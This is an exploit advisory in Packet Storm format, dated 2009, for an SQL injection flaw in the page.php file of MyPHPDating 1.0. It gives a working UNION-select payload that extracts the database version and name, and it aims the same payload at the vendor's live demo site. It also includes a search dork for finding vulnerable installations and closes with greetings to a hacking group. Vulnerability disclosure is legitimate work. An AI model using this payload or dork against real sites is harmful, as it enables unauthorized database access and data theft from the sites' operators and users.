MyPHPDating 1.0 SQL Injection

2009-07-08T00:00:00
ID PACKETSTORM:78999
Type packetstorm
Reporter NoGe
Modified 2009-07-08T00:00:00

Description

                                        
                                            `  
=================================================================================================================================  
  
  
[o] MyPHPDating 1.0 SQL Injection Vulnerability  
  
Software : MyPHPDating version 1.0  
Vendor : http://www.phponlinedatingsoftware.com/  
Demo : http://www.phponlinedatingsoftware.com/demo.htm  
Author : NoGe  
Contact : noge[dot]code[at]gmail[dot]com  
Blog : http://evilc0de.blogspot.com  
  
  
=================================================================================================================================  
  
  
[o] Description  
  
MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.  
It combines all the features of any standard online dating / Matchmaking website plus much more features,  
that make your dating website very powerful and easy to use.  
  
  
  
[o] Vulnerable file  
  
page.php  
  
  
  
[o] Exploit  
  
http://localhost/[path]/page.php?page_id=[SQL]  
http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--  
  
  
  
[o] Proof of concept [demo]  
  
http://www.phponlinedatingsoftware.com/demo/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--  
  
  
  
[o] Dork  
  
"Powered by MyPHPDating"  
  
  
=================================================================================================================================  
  
  
[o] Greetz  
  
MainHack BrotherHood [ http://serverisdown.org/news ]  
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang  
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella  
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke  
  
  
=================================================================================================================================  
`